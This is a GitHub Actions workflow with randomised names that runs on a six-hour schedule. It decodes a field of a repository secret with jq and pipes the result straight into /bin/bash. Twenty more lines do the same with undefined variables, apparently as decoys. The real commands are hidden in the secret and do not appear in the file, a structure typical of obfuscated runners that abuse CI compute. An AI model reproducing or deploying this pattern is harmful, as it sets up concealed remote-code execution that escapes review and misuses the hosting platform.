name: yuanriyue3461
on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuanriyue3461
        env:
          awcx58216: ${{ secrets.awcx58216 }}
        run: |
          echo $awcx58216 | jq -r .cjc0 | /bin/bash
          echo $ufaza1909 | jq -r .pfuwz7 | /bin/bash
          echo $nvg6 | jq -r .ig8 | /bin/bash
          echo $beubm2264 | jq -r .jsq468 | /bin/bash
          echo $idole9 | jq -r .sph34 | /bin/bash
          echo $tuir3 | jq -r .ibsg0760 | /bin/bash
          echo $boc0 | jq -r .cbz4 | /bin/bash
          echo $k15879 | jq -r .wig40 | /bin/bash
          echo $y46815 | jq -r .k56 | /bin/bash
          echo $ywd4209 | jq -r .zyli9227 | /bin/bash
          echo $xqpql61 | jq -r .c134 | /bin/bash
          echo $gfew5014 | jq -r .plpuz94983 | /bin/bash
          echo $zc9 | jq -r .sictj23 | /bin/bash
          echo $l563 | jq -r .s42224 | /bin/bash
          echo $tzymq09967 | jq -r .az1709 | /bin/bash
          echo $cftc065 | jq -r .wahxw29063 | /bin/bash
          echo $dhg69 | jq -r .pgajt97 | /bin/bash
          echo $x259 | jq -r .n68146 | /bin/bash
          echo $txwnl774 | jq -r .zrt215 | /bin/bash
          echo $a1 | jq -r .hlvcq435 | /bin/bash
          echo $vw781 | jq -r .i2181 | /bin/bash

